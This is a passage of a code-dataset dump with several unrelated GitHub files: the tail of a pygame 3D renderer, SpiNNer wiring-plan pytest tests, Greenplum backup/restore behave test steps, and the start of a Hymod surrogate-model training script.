matrix_inverse(camera_matrix)\r\n view_matrix = np.linalg.inv(camera_matrix)\r\n\r\n depth_list = []\r\n\r\n for triangle in shape.triangles:\r\n\r\n triangle_translated = np.zeros((3,4))\r\n\r\n for i in range(3):\r\n triangle_translated[i] = np.dot(np.dot(triangle[i], rotation_Y), rotation_X)\r\n triangle_translated[i, 2] = np.add(triangle_translated[i, 2], 6)\r\n\r\n vector_1 = create_vector(triangle_translated[1], triangle_translated[0])\r\n vector_2 = create_vector(triangle_translated[2], triangle_translated[0])\r\n\r\n normal = np.cross(vector_1, vector_2)\r\n normal = normalize(normal)\r\n\r\n camera_ray = create_vector(triangle_translated[0], camera.pos)\r\n\r\n if np.dot(normal, camera_ray) < 0:\r\n light = [0, 0, -1]\r\n light = normalize(light)\r\n dot_product = np.dot(light, normal)\r\n a = mapX(max(dot_product, 0.1), 0, 1, 0, 255)\r\n\r\n triangle_viewed = np.zeros((3, 4))\r\n triangle_viewed[0] = np.dot(view_matrix, triangle_translated[0])\r\n triangle_viewed[1] = np.dot(view_matrix, triangle_translated[1])\r\n triangle_viewed[2] = np.dot(view_matrix, triangle_translated[2])\r\n\r\n triangle_projected = np.zeros((3, 3))\r\n for i in range(3):\r\n triangle_p = multiply_normalize(triangle_viewed[i], projection)\r\n triangle_projected[i] = triangle_p\r\n\r\n for i in range(3):\r\n triangle_projected[i, 0] *= -1\r\n triangle_projected[i, 1] *= -1\r\n\r\n x, y = [], []\r\n for i in range(3):\r\n triangle_projected[i, 0] += 1#np.add(triangle_projected[i, 0], 1)\r\n triangle_projected[i, 1] += 1#np.add(triangle_projected[i, 1], 1)\r\n triangle_projected[i, 0] *= 0.5 * w\r\n triangle_projected[i, 1] *= 0.5 * h\r\n x.append(triangle_projected[i, 0])\r\n y.append(triangle_projected[i, 1])\r\n\r\n z = (triangle_translated[0][2] + triangle_translated[1][2] + triangle_translated[2][2]) / 3\r\n depth_list.append([z, [x[0], y[0]], [x[1], y[1]], [x[2], y[2]], a])\r\n\r\n depth_list = sorted(depth_list, reverse=1)\r\n\r\n for i in range(len(depth_list)):\r\n pygame.draw.polygon(screen, (depth_list[i][4], depth_list[i][4], depth_list[i][4]),\r\n ((depth_list[i][1][0], depth_list[i][1][1]),\r\n (depth_list[i][2][0], depth_list[i][2][1]),\r\n (depth_list[i][3][0], depth_list[i][3][1])), 0)\r\n\r\n pygame.display.flip()\r\n","repo_name":"1Kori256/python_3d_engine","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"1620927500","text":"import pytest\n\nfrom six import iteritems\n\nfrom example_cabinet_params import real\n\nfrom spinner import plan\nfrom spinner import board\nfrom spinner import topology\nfrom spinner import transforms\nfrom spinner import utils\nfrom spinner import coordinates\nfrom spinner import cabinet\nfrom spinner import metrics\n\nfrom spinner.topology import Direction\n\n\ndef test_enumerate_wires():\n\t# Special case: empty\n\tassert plan.enumerate_wires([]) == []\n\t\n\t# Test exhaustively with a triad\n\tboards = board.create_torus()\n\tc2b = {topology.to_xy(c): b for b,c in boards}\n\twires = plan.enumerate_wires(boards)\n\tassert len(wires) == 3 * 3\n\tassert set(wires) == set([\n\t\t# From (0, 0)\n\t\t((c2b[(0,0)], Direction.north), (c2b[(0,1)], Direction.south)),\n\t\t((c2b[(0,0)], Direction.east), (c2b[(0,1)], Direction.west)),\n\t\t((c2b[(0,0)], Direction.south_west), (c2b[(0,1)], Direction.north_east)),\n\t\t# From (0, 1)\n\t\t((c2b[(0,1)], Direction.north), (c2b[(1,1)], Direction.south)),\n\t\t((c2b[(0,1)], Direction.east), (c2b[(1,1)], Direction.west)),\n\t\t((c2b[(0,1)], Direction.south_west), (c2b[(1,1)], Direction.north_east)),\n\t\t# From (1, 1)\n\t\t((c2b[(1,1)], Direction.north), (c2b[(0,0)], Direction.south)),\n\t\t((c2b[(1,1)], Direction.east), (c2b[(0,0)], Direction.west)),\n\t\t((c2b[(1,1)], Direction.south_west), (c2b[(0,0)], Direction.north_east)),\n\t])\n\n\ndef test_partition_wires():\n\t# Verify the correctness with a two-cabinet system.\n\thex_boards, folded_boards = utils.folded_torus(10, 8, \"shear\", \"rows\", (2,2))\n\tcabinetised_boards = transforms.cabinetise(folded_boards, 2, 5, 24)\n\tall_wires = plan.enumerate_wires(cabinetised_boards)\n\t\n\tbetween_boards, between_frames, between_cabinets =\\\n\t\tplan.partition_wires(all_wires, cabinetised_boards)\n\t\n\t# Should have the correct set of categories\n\tassert len(between_boards) == 5 * 2\n\tassert len(between_frames) == 2\n\t\n\tseen_wires = set()\n\tb2c = dict(cabinetised_boards)\n\t\n\tfor (cabinet, frame), wires in iteritems(between_boards):\n\t\tassert 0 <= cabinet < 2\n\t\tassert 0 <= frame < 5\n\t\tfor ((src_board, src_direction), (dst_board, dst_direction)) in wires:\n\t\t\t# Check it really does stay in the same frame\n\t\t\tsc, sf, sb = b2c[src_board]\n\t\t\tdc, df, db = b2c[dst_board]\n\t\t\tassert sc == cabinet\n\t\t\tassert dc == cabinet\n\t\t\tassert sf == frame\n\t\t\tassert df == frame\n\t\t\tassert (sc, sf) == (dc, df)\n\t\t\tassert src_direction.opposite == dst_direction\n\t\t\t\n\t\t\t# Check we've not seen it before\n\t\t\twire = ((src_board, src_direction), (dst_board, dst_direction))\n\t\t\tassert wire not in seen_wires\n\t\t\tseen_wires.add(wire)\n\t\n\tfor cabinet, wires in iteritems(between_frames):\n\t\tassert 0 <= cabinet < 2\n\t\tfor ((src_board, src_direction), (dst_board, dst_direction)) in wires:\n\t\t\t# Check it really does stay in the same cabinet\n\t\t\tsc, sf, sb = b2c[src_board]\n\t\t\tdc, df, db = b2c[dst_board]\n\t\t\tassert sc == cabinet\n\t\t\tassert dc == cabinet\n\t\t\tassert sc == dc\n\t\t\tassert sf != df\n\t\t\tassert src_direction.opposite == dst_direction\n\t\t\t\n\t\t\t# Check we've not seen it before\n\t\t\twire = ((src_board, src_direction), (dst_board, dst_direction))\n\t\t\tassert wire not in seen_wires\n\t\t\tseen_wires.add(wire)\n\t\n\tfrom pprint import pprint\n\tfor ((src_board, src_direction), (dst_board, dst_direction)) in between_cabinets:\n\t\t# Check it really doesn't stay within a cabinet\n\t\tsc, sf, sb = b2c[src_board]\n\t\tdc, df, db = b2c[dst_board]\n\t\tassert sc != dc\n\t\tassert src_direction.opposite == dst_direction\n\t\t\n\t\t# Check we've not seen it before\n\t\twire = ((src_board, src_direction), (dst_board, dst_direction))\n\t\tassert wire not in seen_wires\n\t\tseen_wires.add(wire)\n\t\n\t# Should have seen all wires too!\n\tassert seen_wires == set(all_wires)\n\n\ndef test_assign_wires():\n\t# Simply check the appropriateness of each point provided in an example system.\n\thex_boards, folded_boards = utils.folded_torus(4, 2, \"shear\", \"rows\", (2,2))\n\tcabinetised_boards = transforms.cabinetise(folded_boards, 1, 1, 24)\n\twires = plan.enumerate_wires(cabinetised_boards)\n\t\n\t# Map each board to a point along a line.\n\tphysical_boards = [(board, coordinates.Cartesian3D(float(b), 0.0, 0.0))\n\t for board, (c, f, b) in cabinetised_boards]\n\tb2c = dict(physical_boards)\n\t\n\t# Given in no particular order\n\tavailable_wire_lengths = [8.0, 3.0, 24.0]\n\t\n\tboard_wire_offset = {\n\t\tDirection.north: coordinates.Cartesian3D(0.0, 0.0, 0.0),\n\t\tDirection.south: coordinates.Cartesian3D(1.0, 0.0, 0.0),\n\t\tDirection.east: coordinates.Cartesian3D(0.0, 1.0, 0.0),\n\t\tDirection.west: coordinates.Cartesian3D(0.0, 0.0, 1.0),\n\t\tDirection.north_east: coordinates.Cartesian3D(1.0, 1.0, 1.0),\n\t\tDirection.south_west: coordinates.Cartesian3D(-1.0, -1.0, -1.0),\n\t}\n\t\n\tlast_wire = None\n\tlast_arc_height = None\n\tfor src, dst, wire in plan.assign_wires(wires, physical_boards,\n\t board_wire_offset,\n\t available_wire_lengths, 0.0):\n\t\t# Check the wire was chosen correctly\n\t\tdistance = ((b2c[src[0]] + board_wire_offset[src[1]]) -\n\t\t (b2c[dst[0]] + board_wire_offset[dst[1]])).magnitude()\n\t\tshortest_possible_wire, arc_height = metrics.physical_wire_length(\n\t\t\tdistance, available_wire_lengths, 0.0)\n\t\tassert wire == shortest_possible_wire\n\t\t\n\t\t# Make sure wires are given in ascending order of arc height unless the\n\t\t# wire length changes\n\t\tif last_wire == wire and last_arc_height is not None:\n\t\t\tassert arc_height >= last_arc_height\n\t\tlast_arc_height = arc_height\n\t\t\n\t\tlast_wire = wire\n\n\ndef test_generate_wiring_plan():\n\t# Since generate_wiring_plan is largely a wrapper around the functions tested\n\t# above, this simply tests that the output is not insane...\n\thex_boards, folded_boards = utils.folded_torus(10, 8, \"shear\", \"rows\", (2,2))\n\tcabinetised_boards = transforms.cabinetise(folded_boards, 2, 5, 24)\n\tcab = cabinet.Cabinet(**real)\n\tphysical_boards = transforms.cabinet_to_physical(cabinetised_boards, cab)\n\tall_wires = plan.enumerate_wires(cabinetised_boards)\n\tavailable_wire_lengths = [0.3, 0.5, 1.0]\n\t\n\tb2c = dict(cabinetised_boards)\n\t\n\tbetween_boards, between_frames, between_cabinets =\\\n\t\tplan.generate_wiring_plan(cabinetised_boards, physical_boards,\n\t\t cab.board_wire_offset,\n\t\t available_wire_lengths,\n\t\t 0.0)\n\t\n\tseen_wires = set()\n\t\n\tassert set(between_boards) == set((c, f, d)\n\t for c in range(cab.num_cabinets)\n\t for f in range(cab.frames_per_cabinet)\n\t for d in [Direction.north,\n\t Direction.south_west,\n\t Direction.east])\n\tfor (cabinet_num, frame_num, direction), wires in iteritems(between_boards):\n\t\tfor ((src_board, src_direction), (dst_board, dst_direction),\n\t\t wire_length) in wires:\n\t\t\t# The board does stay in the frame_num and goes in the specified direction\n\t\t\tc, f, b = b2c[src_board]\n\t\t\tassert c == cabinet_num\n\t\t\tassert f == frame_num\n\t\t\tassert src_direction == direction\n\t\t\t\n\t\t\tc, f, b = b2c[dst_board]\n\t\t\tassert c == cabinet_num\n\t\t\tassert f == frame_num\n\t\t\tassert dst_direction == direction.opposite\n\t\t\t\n\t\t\t# The wire length chosen should exist\n\t\t\tassert wire_length in available_wire_lengths\n\t\t\t\n\t\t\t# Check we've not seen it before\n\t\t\twire = ((src_board, src_direction), (dst_board, dst_direction))\n\t\t\tassert wire not in seen_wires\n\t\t\tseen_wires.add(wire)\n\t\n\tassert set(between_frames) == set((c, d)\n\t for c in range(cab.num_cabinets)\n\t for d in [Direction.north,\n\t Direction.south_west,\n\t Direction.east])\n\tfor (cabinet_num, direction), wires in iteritems(between_frames):\n\t\tfor ((src_board, src_direction), (dst_board, dst_direction),\n\t\t wire_length) in wires:\n\t\t\t# The board does stay in the cabinet and goes in the specified direction\n\t\t\tc, f, b = b2c[src_board]\n\t\t\tassert c == cabinet_num\n\t\t\tassert src_direction == direction\n\t\t\t\n\t\t\tc, f, b = b2c[dst_board]\n\t\t\tassert c == cabinet_num\n\t\t\tassert dst_direction == direction.opposite\n\t\t\t\n\t\t\tassert wire_length in available_wire_lengths\n\t\t\t\n\t\t\t# Check we've not seen it before\n\t\t\twire = ((src_board, src_direction), (dst_board, dst_direction))\n\t\t\tassert wire not in seen_wires\n\t\t\tseen_wires.add(wire)\n\t\n\tassert set(between_cabinets) == set([Direction.north,\n\t Direction.south_west,\n\t Direction.east])\n\tfor direction, wires in iteritems(between_cabinets):\n\t\tfor ((src_board, src_direction), (dst_board, dst_direction),\n\t\t wire_length) in wires:\n\t\t\t# The board does stay in the cabinet and goes in the specified direction\n\t\t\tassert src_direction == direction\n\t\t\tassert dst_direction == direction.opposite\n\t\t\t\n\t\t\tassert wire_length in available_wire_lengths\n\t\t\t\n\t\t\t# Check we've not seen it before\n\t\t\twire = ((src_board, src_direction), (dst_board, dst_direction))\n\t\t\tassert wire not in seen_wires\n\t\t\tseen_wires.add(wire)\n\t\n\t# All wires should have been seen\n\tassert seen_wires == set(all_wires)\n\n\ndef test_flatten_wiring_plan():\n\t# Provide an artificial input to this function with a known correct sorting.\n\t# In the input, the board object is replaced with an integer indicating its\n\t# correct position in the ordering.\n\t\n\tcab = cabinet.Cabinet(**real)\n\tdirection_order = sorted([Direction.north, Direction.east, Direction.south_west],\n\t key=(lambda d: cab.board_wire_offset[d].y))\n\t\n\tnum = [0]\n\tdef gen_wire(d_num):\n\t\tnum[0] += 1\n\t\treturn ((num[0], direction_order[d_num]),\n\t\t (-num[0], direction_order[d_num].opposite),\n\t\t 1.0)\n\t\n\twires_between_boards = {\n\t\t(c, f, direction_order[d_num]) : [gen_wire(d_num) for _ in range(5)]\n\t\tfor c in range(2)\n\t\tfor f in range(5)\n\t\tfor d_num in range(3)\n\t}\n\t\n\twires_between_frames = {\n\t\t(c, direction_order[d_num]) : [gen_wire(d_num) for _ in range(5)]\n\t\tfor c in range(2)\n\t\tfor d_num in range(3)\n\t}\n\t\n\twires_between_cabinets = {\n\t\tdirection_order[d_num] : [gen_wire(d_num) for _ in range(5)]\n\t\tfor d_num in range(3)\n\t}\n\t\n\tflat_plan = plan.flatten_wiring_plan(wires_between_boards,\n\t wires_between_frames,\n\t wires_between_cabinets,\n\t cab.board_wire_offset)\n\t\n\t# Should have a plan with one instruction per wire\n\tassert len(flat_plan) == num[0]\n\t\n\t# Plan should be in the predicted order\n\tassert [sb for ((sb, sd), (db, dd), wl) in flat_plan] ==\\\n\t\tlist(range(1, num[0]+1))\n","repo_name":"SpiNNakerManchester/SpiNNer","sub_path":"tests/test_plan.py","file_name":"test_plan.py","file_ext":"py","file_size_in_byte":10550,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"30462819714","text":"# coding: utf-8 \n\nimport thread\nimport os\nimport socket\nimport filecmp\nfrom gppylib.commands.base import Command, ExecutionError, REMOTE, WorkerPool, CommandResult\nfrom gppylib.db import dbconn\nfrom gppylib.test.behave_utils.utils import run_gpcommand, getRows, validate_parse_email_file\nfrom gppylib.gparray import GpArray\nfrom gppylib.operations.unix import CheckFile\n\nmaster_data_dir = os.environ.get('MASTER_DATA_DIRECTORY')\n\ncomment_start_expr = '-- '\ncomment_expr = '-- Name: '\ncomment_data_expr_a = '-- Data: '\ncomment_data_expr_b = '-- Data for Name: '\nlen_start_comment_expr = len(comment_start_expr)\n\n@given('the user locks \"{table_name}\" in \"{lock_mode}\" using connection \"{conn}\" on \"{dbname}\"')\n@when('the user locks \"{table_name}\" in \"{lock_mode}\" using connection \"{conn}\" on \"{dbname}\"')\n@then('the user locks \"{table_name}\" in \"{lock_mode}\" using connection \"{conn}\" on \"{dbname}\"')\ndef impl(context, table_name, lock_mode, conn, dbname):\n query = \"begin; lock table %s in %s\" % (table_name, lock_mode)\n conn = dbconn.connect(dbconn.DbURL(dbname=dbname))\n dbconn.execSQL(conn, query) \n context.conn = conn\n\n@when('the user runs the query \"{query}\" in database \"{dbname}\" in a worker pool \"{poolname}\" as soon as pg_class is locked')\n@then('the user runs the query \"{query}\" in database \"{dbname}\" in a worker pool \"{poolname}\" as soon as pg_class is locked')\ndef impl(context, query, dbname, poolname):\n pool = WorkerPool(numWorkers=1)\n cmd = on_unlock(query,dbname)\n pool.addCommand(cmd)\n if not hasattr(context, 'pool'):\n context.pool = {}\n context.pool[poolname] = pool\n context.cmd = cmd\n\n@when('the user runs the \"{cmd}\" in a worker pool \"{poolname}\"')\n@then('the user runs the \"{cmd}\" in a worker pool \"{poolname}\"')\ndef impl(context, cmd, poolname):\n command = Command(name='run gpcrondump in a separate thread', cmdStr=cmd)\n pool = WorkerPool(numWorkers=1)\n pool.addCommand(command)\n if not hasattr(context, 'pool'):\n context.pool = {}\n context.pool[poolname] = pool\n context.cmd = cmd\n \nclass on_unlock(Command):\n def __init__(self, query, dbname):\n self.dbname = dbname\n self.query = query\n self.result = 1\n self.completed = False\n self.halt = False\n Command.__init__(self, 'on unlock', 'on unlock', ctxt=None, remoteHost=None)\n\n def get_results(self):\n return CommandResult(self.result, '', '', self.completed, self.halt)\n\n def run(self):\n while check_pg_class_lock(self.dbname) != 1:\n pass\n with dbconn.connect(dbconn.DbURL(dbname=self.dbname)) as conn:\n dbconn.execSQL(conn, self.query)\n self.result = 0\n self.completed = True\n self.halt = False\n\ndef check_pg_class_lock(dbname):\n seg_count = 1\n\n query = \"\"\"select count(*)\n from pg_locks\n where relation in (select oid from pg_class where relname='pg_class')\n and locktype='relation' and mode='ExclusiveLock'\"\"\"\n row_count = getRows(dbname, query)[0][0]\n return row_count\n\n@given('the \"{backup_pg}\" has a lock on the pg_class table in \"{dbname}\"')\n@when('the \"{backup_pg}\" has a lock on the pg_class table in \"{dbname}\"')\n@then('the \"{backup_pg}\" has a lock on the pg_class table in \"{dbname}\"')\ndef impl(context, dbname, backup_pg):\n seg_count = 1\n timeout = 2\n while timeout > 0:\n row_count = check_pg_class_lock(dbname)\n time.sleep(1)\n timeout -= 1\n if row_count != seg_count:\n raise Exception(\"Incorrect (number of) lock/locks on pg_class, expected count = %s, received count = %s\" % (seg_count, row_count))\n\n@then('the worker pool \"{poolname}\" is cleaned up')\n@when('the worker pool \"{poolname}\" is cleaned up')\ndef impl(context, poolname):\n pool = context.pool[poolname]\n if pool:\n pool.join()\n for c in pool.getCompletedItems():\n result = c.get_results()\n context.ret_code = result.rc\n context.stdout_message = result.stdout\n context.error_message = result.stderr\n pool.haltWork()\n pool.joinWorkers()\n else:\n raise Exception('Worker pool is None.Probably behave step to initialize the worker pool is missing.')\n\n@given('the user drops \"{tablename}\" in \"{dbname}\" in a worker pool \"{poolname}\"')\n@then('the user drops \"{tablename}\" in \"{dbname}\" in a worker pool \"{poolname}\"')\n@when('the user drops \"{tablename}\" in \"{dbname}\" in a worker pool \"{poolname}\"')\ndef impl(context, tablename, dbname, poolname):\n pool = WorkerPool(numWorkers=1)\n cmd = Command(name='drop a table in a worker pool', cmdStr=\"\"\"psql -c \"DROP TABLE %s\" -d %s\"\"\" % (tablename, dbname))\n pool.addCommand(cmd)\n if not hasattr(context, 'pool'):\n context.pool = {}\n context.pool[poolname] = pool\n \n\n@given('the user closes the connection \"{conn_name}\"')\n@when('the user closes the connection \"{conn_name}\"')\n@then('the user closes the connection \"{conn_name}\"')\ndef impl(context, conn_name):\n query = \"\"\"ROLLBACK;\"\"\"\n dbconn.execSQL(context.conn, query) \n context.conn.close()\n\n@given('verify that \"{backup_pg}\" has no lock on the pg_class table in \"{dbname}\"')\n@when('verify that \"{backup_pg}\" has no lock on the pg_class table in \"{dbname}\"')\n@then('verify that \"{backup_pg}\" has no lock on the pg_class table in \"{dbname}\"')\ndef impl(context, backup_pg, dbname):\n query = \"\"\"select count(*) \n from pg_locks \n where relation in (select oid from pg_class where relname='pg_class') \n and locktype='relation' and mode='ExclusiveLock'\"\"\"\n\n row_count = getRows(dbname, query)[0][0]\n if row_count != 0:\n raise Exception(\"Found a ExclusiveLock on pg_class\")\n\n@given('there is a \"{tabletype}\" table \"{table_name}\" with compression \"{compression_type}\" in \"{dbname}\" with data and {rowcount} rows')\n@when('there is a \"{tabletype}\" table \"{table_name}\" with compression \"{compression_type}\" in \"{dbname}\" with data and {rowcount} rows')\n@then('there is a \"{tabletype}\" table \"{table_name}\" with compression \"{compression_type}\" in \"{dbname}\" with data and {rowcount} rows')\ndef impl(context, tabletype, table_name, compression_type, dbname, rowcount):\n populate_regular_table_data(context, tabletype, table_name, compression_type, dbname, int(rowcount))\n\n@given('verify the metadata dump file syntax under \"{directory}\" for comments and types')\n@when('verify the metadata dump file syntax under \"{directory}\" for comments and types')\n@then('verify the metadata dump file syntax under \"{directory}\" for comments and types')\ndef impl(context, directory):\n names = [\"Name\", \"Data\", \"Data for Name\"]\n types = [\"TABLE\", \"TABLE DATA\", \"EXTERNAL TABLE\", \"ACL\", \"CONSTRAINT\", \"COMMENT\", \"PROCEDURAL LANGUAGE\", \"SCHEMA\", \"AOSTORAGEOPTS\"]\n master_dump_dir = directory if len(directory.strip()) != 0 else master_data_dir\n timestamp = context.backup_timestamp\n metadata_file = '%s/db_dumps/%s/gp_dump_1_1_%s.gz' % (master_dump_dir, timestamp[0:8], timestamp)\n tmp_metadata_file = '/tmp/behave_metadata_file'\n\n cmd = Command(name=\"Unzip conetnts of metadata dump file to temp file\", cmdStr='zcat %s > %s' % (metadata_file, tmp_metadata_file))\n cmd.run(validateAfter=True)\n\n try:\n with open(tmp_metadata_file, 'r') as fd:\n lines = fd.readlines() \n if len(lines) == 0:\n raise Exception('Metadata file has no data')\n for line in lines:\n if (line[:3] == comment_start_expr):\n if (line.startswith(comment_expr) or line.startswith(comment_data_expr_a) or line.startswith(comment_data_expr_b)):\n name_k, type_k, schema_k = get_comment_keys(line)\n if (name_k not in names and type_k != \"Type\" and schema_k != \"Schema\"):\n raise Exception(\"Unknown key in the comment line of the metdata_file '%s'. Please check and confirm if the key is correct\" % (metadata_file))\n name_v, type_v, schema_v = get_comment_values(line)\n if (type_v not in types):\n raise Exception(\"Value of Type in the comment line '%s' of the metadata_file '%s' does not fall under the expected list %s. Please check if the value is correct\" %(type_v, metadata_file, types))\n finally:\n if os.path.exists(tmp_metadata_file):\n os.remove(tmp_metadata_file)\n\ndef get_comment_keys(line):\n try:\n temp = line[len_start_comment_expr:]\n tokens = temp.strip().split(';')\n name = tokens[0].split(':')[0].strip()\n type = tokens[1].split(':')[0].strip()\n schema = tokens[2].split(':')[0].strip()\n except:\n return (None, None, None)\n return (name, type, schema) \n\ndef get_comment_values(line):\n try:\n temp = line[len_start_comment_expr:]\n tokens = temp.strip().split(';')\n name = tokens[0].split(':')[1].strip()\n type = tokens[1].split(':')[1].strip()\n schema = tokens[2].split(':')[1].strip()\n except:\n return (None, None, None)\n return (name, type, schema) \n\n@given('{command} should print {out_msg} to stdout {num} times')\n@when('{command} should print {out_msg} to stdout {num} times')\n@then('{command} should print {out_msg} to stdout {num} times')\ndef impl(context, command, out_msg, num):\n msg_list = context.stdout_message.split('\\n')\n msg_list = [x.strip() for x in msg_list]\n\n count = msg_list.count(out_msg)\n if count != int(num):\n raise Exception(\"Expected %s to occur %s times. Found %d\" % (out_msg, num, count))\n\n@given('verify that {filetype} file is generated in {dir}')\n@when('verify that {filetype} file is generated in {dir}')\n@then('verify that {filetype} file is generated in {dir}')\ndef impl(context, filetype, dir):\n if dir == 'master_data_directory':\n dir = master_data_dir\n if filetype == 'report':\n filename = '%s/gp_restore_%s.rpt' % (dir, context.backup_timestamp)\n if not os.path.isfile(filename):\n raise Exception('Report file %s is not present in master data directory' % filename)\n elif filetype == 'status':\n gparray = GpArray.initFromCatalog(dbconn.DbURL())\n if dir == 'segment_data_directory':\n primary_segs = [seg for seg in gparray.getDbList() if seg.isSegmentPrimary()]\n for seg in primary_segs:\n host = seg.getSegmentHostName()\n seg_data_dir = seg.getSegmentDataDirectory()\n cmd = Command('check status file', \"ls %s/gp_restore_status_*_%s\" % (seg_data_dir, context.backup_timestamp), ctxt=REMOTE, remoteHost=host)\n cmd.run(validateAfter=True)\n results = cmd.get_results()\n if not results.stdout.strip():\n raise Exception('Status file ending with timestamp %s is not present in segment %s data directory' % (context.backup_timestamp, host))\n else:\n count = 0\n primary_segs = [seg for seg in gparray.getDbList() if seg.isSegmentPrimary()]\n for seg in primary_segs:\n host = seg.getSegmentHostName()\n cmd = Command('check status file', \"ls %s/gp_restore_status_*_%s\" % (dir, context.backup_timestamp), ctxt=REMOTE, remoteHost=host)\n cmd.run(validateAfter=True)\n results = cmd.get_results()\n if results.stdout.strip():\n count += 1\n else:\n raise Exception('Status file not found in segment: %s' % host)\n segs = len(primary_segs)\n if count != segs:\n raise Exception('Expected %d status file but found %d' % (segs, count))\n\n@given('there are no {filetype} files in \"{dir}\"')\n@when('there are no {filetype} files in \"{dir}\"')\n@then('there are no {filetype} files in \"{dir}\"')\ndef impl(context, filetype, dir):\n if filetype == 'report':\n if dir == 'master_data_directory':\n dir = master_data_dir\n filenames = os.listdir(dir)\n for filename in filenames:\n if filename.startswith('gp_restore') and filename.endswith('.rpt'):\n filename = '%s/%s' % (dir, filename)\n os.remove(filename)\n if filetype == 'status':\n gparray = GpArray.initFromCatalog(dbconn.DbURL())\n if dir == 'segment_data_directory':\n primary_segs = [seg for seg in gparray.getDbList() if seg.isSegmentPrimary()]\n for seg in primary_segs:\n host = seg.getSegmentHostName()\n seg_data_dir = seg.getSegmentDataDirectory()\n cmd = Command('remove status file', \"rm -f %s/gp_restore_status_*\" % (seg_data_dir), ctxt=REMOTE, remoteHost=host)\n cmd.run(validateAfter=True)\n else:\n primary_segs = [seg for seg in gparray.getDbList() if seg.isSegmentPrimary()]\n for seg in primary_segs:\n host = seg.getSegmentHostName()\n cmd = Command('remove status file', \"rm -f %s/gp_restore_status_*\" % dir, ctxt=REMOTE, remoteHost=host)\n cmd.run(validateAfter=True)\n\n@given('the mail_contacts file does not exist')\n@then('the mail_contacts file does not exist')\ndef impl(context):\n if \"HOME\" in os.environ:\n home_mail_file = os.path.join(os.environ[\"HOME\"], \"mail_contacts\")\n if CheckFile(home_mail_file).run():\n os.remove(home_mail_file)\n if \"GPHOME\" in os.environ:\n mail_file = os.path.join(os.environ[\"GPHOME\"], \"bin\", \"mail_contacts\")\n if CheckFile(mail_file).run():\n os.remove(mail_file)\n\n@given('the mail_contacts file exists')\ndef impl(context):\n context.email_contact = \"example_test@gopivotal.com\"\n if \"HOME\" in os.environ:\n home_mail_file = os.path.join(os.environ[\"HOME\"], \"mail_contacts\")\n mail_contact = home_mail_file\n elif \"GPHOME\" in os.environ:\n mail_file = os.path.join(os.environ[\"GPHOME\"], \"bin\", \"mail_contacts\")\n mail_contact = mail_file\n f = file(mail_contact, 'w+')\n f.write(context.email_contact)\n f.close\n\n@given('the yaml file \"{email_file_path}\" stores email details is in proper format')\ndef impl(context, email_file_path):\n try:\n validate_parse_email_file(context, email_file_path)\n except Exception as e:\n raise Exception(str(e))\n\n@given('the yaml file \"{email_file_path}\" stores email details is not in proper format')\ndef impl(context, email_file_path):\n exception_raised = False\n try:\n validate_parse_email_file(context, email_file_path)\n except Exception as e:\n exception_raised = True\n if exception_raised == False:\n raise Exception(\"File is in proper format\")\n\n@then('verify that emails are sent to the given contacts with appropriate messages after backup of \"{dblist}\"')\ndef impl(context, dblist):\n cmd_list = []\n sending_email_list = []\n database_list = dblist.split(',')\n stdout = context.stdout_message\n for line in stdout.splitlines():\n if \"Sending mail to\" in line:\n str = line.split(':-')[1]\n sending_email_list.append(str.strip())\n if \"Email command string=\" in line:\n log_msg, delim, txt = line.partition('=')\n cmd_list.append(txt.strip())\n if len(sending_email_list) != len(database_list):\n raise Exception(\"Emails are not sent properly\")\n count = 0\n for dbname in database_list:\n #expected email details\n for email in context.email_details:\n if dbname in email['DBNAME']:\n expected_from = email['FROM']\n expected_sub = email['SUBJECT']\n else:\n expected_sub = \"Report from gpcrondump on host %s [COMPLETED]\" % socket.gethostname()\n #original email details\n result_cmd = cmd_list[count]\n str = result_cmd[result_cmd.find(\"-s\")+4:]\n result_sub = (str[:str.find('\"')]).strip()\n if expected_sub != result_sub:\n raise Exception(\"Subject of the sent email is not correct\")\n if result_cmd.find(\"-- -f\") >= 0:\n result_from = result_cmd[result_cmd.find(\"-- -f\")+6:]\n if expected_from != result_from:\n raise Exception(\"ef : RF\", expected_from, result_from, count)\n #raise Exception(\"Sender of the sent email is not correct\")\n count += 1\n\n@then('gpcrondump should print unable to send dump email notification to stdout as warning')\ndef impl(context):\n stdout = context.stdout_message\n found = False\n for line in stdout.splitlines():\n if \"Unable to send dump email notification\" in line:\n found = True\n if found is False:\n raise Exception(\"'Unable to send dump email notification' exception is not raised\")\n\n@then('verify that function is backedup correctly in \"{dumpfile}\"')\ndef impl(context, dumpfile):\n buf = \"\"\"CREATE ORDERED AGGREGATE agg_array(anyelement) (\n SFUNC = array_append,\n STYPE = anyarray,\n INITCOND = '{}'\n);\"\"\"\n if not buf in open(dumpfile).read():\n raise Exception(\"pg_dump did not backup aggregate functions correctly.\")\n","repo_name":"vitessedata/gpdb.4.3.99.x","sub_path":"gpdb/gpMgmt/bin/gppylib/test/behave/mgmt_utils/steps/backup_mgmt_utils.py","file_name":"backup_mgmt_utils.py","file_ext":"py","file_size_in_byte":17209,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"34"} +{"seq_id":"32878700643","text":"import numpy as np\nimport joblib\nfrom time import time\nimport argparse\nimport os\n\nimport warnings\nfrom sklearn.exceptions import ConvergenceWarning\nwarnings.filterwarnings('ignore')\n\nimport sys\nsys.path.append('../../src/')\nsys.path.append('../../config/')\n\nfrom surrogate import Hymod, KRRcv\nfrom config import Hymod_inputs, KRR_hyperparams, Random_seeds\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--n_samples\", type=int, required=True, help=\"Number of training samples.\")\nparser.add_argument(\"--index\", type=int, required=False, default=-1, help=\"Index of run.\")\nargs = parser.parse_args()\nn = args.n_samples\nindex = args.index\n\nnp.random.seed(Random_seeds[\"Hymod_train\"])\n\nMODEL_DIR = '../models/'\nos.makedirs(MODEL_DIR, exist_ok=True)\n\nfstar = Hymod()\n\nxmin = Hymod_inputs[\"min\"]\nxmax = Hymod_inputs[\"max\"]\nd = xmin.shape[0]\nX = np.random.rand(n, d) @ np.diag(xmax - xmin) + np.ones((n, d)) @ np.diag(xmin)\ny = fstar.predict(X)\n\nalphas, gammas = KRR_hyperparams[n]\n\nif index >= 0:\n MODEL_DIR = f'{MODEL_DIR}n_{n}/'\n os.makedirs(MODEL_DIR, exist_ok=True)\n\n alpha = alphas[index // len(gammas)]\n gamma = gammas[index % 